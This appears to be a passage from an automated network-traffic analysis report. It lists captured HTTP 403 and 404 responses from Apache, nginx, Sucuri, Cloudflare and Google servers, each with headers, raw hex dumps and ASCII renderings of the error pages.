              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:07 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:08 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: gA80FevHVPkqWbM+n6rDB7HuI3gDK9u/M1Am1WiJrag=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMHX-Wix-Request-Id: 1694755688.3817648794443130153X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:08 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:08 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:10 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:28:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:28:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mN4vVR38julnlxKO0ccpO2OGgYoMvsjaI0jXOfLNsDPHtSsblUJ1r1dgkjoWzTKadShmXZRAWYk3sGE1YY8Dq6BRl2UTZcvKSIlTpysgvXaOn8uTcXuWEgxjmzsYMNw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e770688be0f84-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PCLUXKklyd1gpGpNlWLPmaRsXhfkuJ7BJ8DIEFbdIHtUdL5qZL0iBQ8f%2BQMmn%2BVqkj2bWLW3oWusH6Cg4p9JOr4jEXdJXlMPm7zafoaB7ul3kUUk3CF%2FzQcUMF3l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7717fc4841d5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style=
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BMIGi23wPlglYMvasV5GJ1aogRZi9VbJcV%2FSZnaeV2yccAh8RlwG%2Ba21zSxZj%2FI9zHQpSAj0%2F%2BWETYixydRyDidRFGMU3npM7ZHk4qlll4UioK1mEqtlEofAzYw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e771f8c524255-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:16 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 